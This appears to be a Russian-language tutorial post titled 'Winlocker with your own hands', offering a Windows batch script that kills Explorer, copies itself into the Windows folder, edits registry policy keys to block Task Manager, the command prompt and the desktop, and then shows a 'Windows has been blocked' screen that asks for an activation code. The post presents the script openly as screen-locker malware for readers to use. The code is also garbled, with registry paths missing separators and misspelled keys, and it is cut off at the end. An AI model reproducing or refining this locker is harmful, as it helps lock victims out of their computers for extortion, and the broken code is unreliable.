Винлокер совоими руками .bat

Аватар автора
Учебник по Творчеству
Вот скрипт ------------------------- @echo off color a taskkill /im explorer.exe /f nul copy %0 C:WindowsWin32.bat nul reg Delete HKCUSoftwereMicrosoftWindowsCurrentVersionRun /f nul reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTAskMgr /t REG_DWORD /d 0 /f nul reg add HKCUSoftwereMicrosoftWindowsCurrentVersionPoliciesSystem /v DIsableRegistryTools /t REG_DWORD /d 0 /f nul reg add HKCUSoftwereMicrosoftWindowsCurrentVersionPoliciesSystem /v DIsableCMD/t REG_DWORD/d 0 /f nul reg add HKCUSoftwereMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 0 /f nul reg add HKCUSoftwereMicrosoftWindowsCurrentVersionPoliciesExplorer/v NoCOntrolPanel /t REG_DWORD /d 0 /f nul cls title Windows has been blocked echo Your windows has been blocked :G echo Enter the activation code: set /p x= if %x%==123 ( echo Activatin code is correct echo Starting Windows reg Delete HKCUSoftwereMicrosoftWindowsCurrentVersionRun /f nul reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTAskMgr /t REG_DWORD /d 0 /f nul reg add HKCUSoftwereMicrosoftWindowsCurrentVersionPoliciesSystem /v DIsableRegistryTools /t REG_DWORD /d 0 /f nul reg add HKCUSoftwereMicrosoftWindowsCurrentVersionPoliciesSystem /v DIsableCMD/t REG_DWORD/d 0 /f nul reg add HKCUSoftwereMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 0 /f nul reg add HKCUSoftwereMicrosoftWindowsCurrentVersionPoliciesExplorer/v NoCOntrolPanel /t...

0/0


0/0

0/0

0/0